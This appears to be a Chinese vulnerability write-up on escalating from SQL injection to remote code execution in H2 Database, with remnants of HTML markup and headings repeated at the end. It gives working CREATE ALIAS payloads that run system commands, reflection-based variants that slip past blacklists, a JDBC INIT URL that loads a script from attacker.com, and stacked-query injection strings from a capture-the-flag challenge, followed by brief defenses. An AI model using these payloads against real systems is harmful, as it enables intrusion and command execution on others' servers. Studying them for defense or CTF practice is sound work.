H2 Database 从SQL注入到远程代码执行(RCE)漏洞分析<\/h1>

1. H2 Database简介<\/h2>
H2 Database是一个内存和纯Java数据库，开发人员常用它来学习、单元测试和概念验证(PoC)。它提供了一个Web控制台用于管理数据库，默认情况下没有设置密码。<\/p>

2. 漏洞背景<\/h2>

H2数据库存在多个安全风险点，可能导致从SQL注入到远程代码执行(RCE)：<\/p>

默认无密码的Web控制台<\/li>
危险的SQL函数(FILE_READ\/FILE_WRITE)<\/li>
通过别名(alias)执行Java代码<\/li>

JDBC URL中的INIT参数可执行初始化命令<\/li> <\/ol>

3. 漏洞利用方法<\/h2>

3.1 通过Web控制台利用<\/h3>

3.1.1 文件读写函数<\/h4>

H2提供了危险的内置函数：<\/p>

FILE_READ()<\/code> - 读取文件系统文件<\/li>

FILE_WRITE()<\/code> - 写入文件到文件系统<\/li>
<\/ul>
3.1.2 通过别名执行Java代码<\/h4>

创建别名调用Java代码：<\/li>
<\/ol>
CREATE<\/span> ALIAS<\/span> SHELLEXEC AS<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span> 
<\/span><\/span>    void shellexec(String cmd) throws java.io.IOException {<\/span>
<\/span><\/span>        Runtime.getRuntime().exec<\/span>(cmd);
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span>;
<\/span><\/span><\/code><\/pre>
调用别名执行命令：<\/li>
<\/ol>
CALL<\/span> SHELLEXEC('whoami'<\/span>);
<\/span><\/span><\/code><\/pre>3.2 通过SQL注入利用<\/h3>
3.2.1 自定义函数RCE<\/h4>
当存在SQL注入且支持堆叠查询(Stacked Queries)时：<\/p>

定义Java函数：<\/li>
<\/ol>
CREATE<\/span> ALIAS<\/span> EXEC<\/span> AS<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>
<\/span><\/span>    String exec<\/span>(String cmd) throws java.io.IOException {<\/span>
<\/span><\/span>        java.util.Scanner s =<\/span> new<\/span> java.util.Scanner(Runtime.getRuntime().exec<\/span>(cmd).getInputStream()).useDelimiter("\\A"<\/span>);
<\/span><\/span>        return<\/span> s.hasNext() ?<\/span> s.next<\/span>() : ""<\/span>;
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span>;
<\/span><\/span><\/code><\/pre>
绕过黑名单过滤：<\/li>
<\/ol>

使用Java反射机制<\/li>
可结合Base64编码绕过<\/li>
<\/ul>
示例绕过payload：<\/p>
CREATE<\/span> ALIAS<\/span> EXEC<\/span> AS<\/span> CONCAT('void e(String cmd) throws java.io.IOException{'<\/span>, 
<\/span><\/span>    'java.lang.reflect.Method m=Runtime.class.getMethod("getRuntime");'<\/span>,
<\/span><\/span>    '((java.lang.Runtime)m.invoke(null)).exec(cmd);'<\/span>,
<\/span><\/span>'}'<\/span>);
<\/span><\/span><\/code><\/pre>3.2.2 利用INIT参数远程加载执行<\/h4>
H2 JDBC URL支持INIT参数执行初始化命令：<\/p>

构造恶意JDBC URL：<\/li>
<\/ol>
jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http:\/\/attacker.com\/evil.sql'
<\/code><\/pre>

远程SQL文件内容：<\/li>
<\/ol>
CREATE<\/span> ALIAS<\/span> SHELLEXEC AS<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span> 
<\/span><\/span>    void shellexec(String cmd) throws java.io.IOException {<\/span>
<\/span><\/span>        Runtime.getRuntime().exec<\/span>(cmd);
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span>;
<\/span><\/span>CALL<\/span> SHELLEXEC('calc.exe'<\/span>);
<\/span><\/span><\/code><\/pre>3.3 其他利用技术<\/h3>
3.3.1 使用LINK_SCHEMA函数<\/h4>
CREATE<\/span> LINKED TABLE<\/span> remote_table('org.h2.Driver'<\/span>, 'jdbc:h2:tcp:\/\/attacker_ip\/~\/test'<\/span>, 'sa'<\/span>, ''<\/span>, 'SELECT * FROM INFORMATION_SCHEMA.TABLES'<\/span>);
<\/span><\/span><\/code><\/pre>注意：高版本对URL进行了限制，只允许java开头的URL。<\/p>
3.3.2 使用CSVWRITE函数执行SQL<\/h4>
CALL<\/span> CSVWRITE('\/path\/to\/output.csv'<\/span>, 'SELECT * FROM INFORMATION_SCHEMA.TABLES'<\/span>);
<\/span><\/span><\/code><\/pre>4. 防御措施<\/h2>

为H2 Web控制台设置强密码<\/li>
限制Web控制台的访问权限<\/li>
禁用危险的SQL函数<\/li>
对用户输入进行严格的过滤和参数化查询<\/li>
使用最新版本的H2数据库<\/li>
在生产环境中避免使用H2的Web控制台<\/li>
<\/ol>
5. 实际案例分析<\/h2>
在EasyDB题目中发现的漏洞利用：<\/p>

发现SQL注入点：<\/li>
<\/ol>
String.<\/span>format<\/span>(<\/span>"SELECT * FROM users WHERE username='%s' AND password='%s'"<\/span>,<\/span> user,<\/span> pass);<\/span>
<\/span><\/span><\/code><\/pre>
利用堆叠查询执行恶意SQL：<\/li>
<\/ol>
admin<\/span>'--; CREATE ALIAS EXEC AS 
<\/span><\/span><\/span>$$
<\/span><\/span><\/span> 
<\/span><\/span><\/span>    String exec(String cmd) throws java.io.IOException {
<\/span><\/span><\/span>        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
<\/span><\/span><\/span>        return s.hasNext() ? s.next() : "";
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>; CALL EXEC('<\/span>whoami');--
<\/span><\/span><\/span><\/code><\/pre>
绕过黑名单过滤使用反射：<\/li>
<\/ol>
admin<\/span>'--; CREATE ALIAS EXEC AS CONCAT('<\/span>void e(String cmd) throws java.io.IOException{<\/span>', 
<\/span><\/span><\/span>    '<\/span>java.lang.reflect.Method<\/span> m=<\/span>Runtime.class<\/span>.getMethod("getRuntime"<\/span>);',
<\/span><\/span><\/span>    '<\/span>((java.lang.Runtime)m.invoke(null<\/span>)).exec<\/span>(cmd);',
<\/span><\/span><\/span>'<\/span>}<\/span>'); CALL EXEC('<\/span>\/<\/span>readflag');--
<\/span><\/span><\/span><\/code><\/pre>6. 总结<\/h2>
H2数据库由于其内存特性和丰富的功能，在开发测试中非常有用，但也带来了多种安全风险。攻击者可以通过SQL注入或直接访问Web控制台实现从简单的数据泄露到完全的远程代码执行。开发人员应充分了解这些风险并采取适当的防护措施。<\/p>

H2 Database 从SQL注入到远程代码执行(RCE)漏洞分析<\/h1>

1. H2 Database简介<\/h2> H2 Database是一个内存和纯Java数据库，开发人员常用它来学习、单元测试和概念验证(PoC)。它提供了一个Web控制台用于管理数据库，默认情况下没有设置密码。<\/p>

3. 漏洞利用方法<\/h2>

3.1 通过Web控制台利用<\/h3>

3.2 通过SQL注入利用<\/h3>

3.3 其他利用技术<\/h3>

1. H2 Database简介<\/h2>
H2 Database是一个内存和纯Java数据库，开发人员常用它来学习、单元测试和概念验证(PoC)。它提供了一个Web控制台用于管理数据库，默认情况下没有设置密码。<\/p>